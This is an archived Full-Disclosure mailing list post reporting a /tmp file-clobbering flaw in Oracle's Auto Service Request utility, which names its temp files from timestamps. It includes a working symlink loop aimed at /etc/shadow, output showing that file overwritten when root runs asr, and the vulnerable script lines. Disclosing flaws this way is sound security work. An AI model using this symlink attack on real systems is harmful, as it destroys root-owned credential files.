| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 01 Mar 2013 03:55:41 +0000 (GMT)
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Subject: Oracle Auto Service Request /tmp file clobbering
vulnerability
Oracle Auto Service Request /tmp file clobbering vulnerability
http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm
I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility.
[larry@...cle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@...cle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
Problem code:
The asr binary is a wrapper for a java class, the following snippet of code is where the error lies:
/sbin/sh:root@...x-solaris# grep -n tmp asr
409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'`
1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
This affects the software package on both Solaris and Linux.
Vendor notified about a month ago.
@_larry0
Larry W. Cashdollar
http://otiose.dhs.org/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists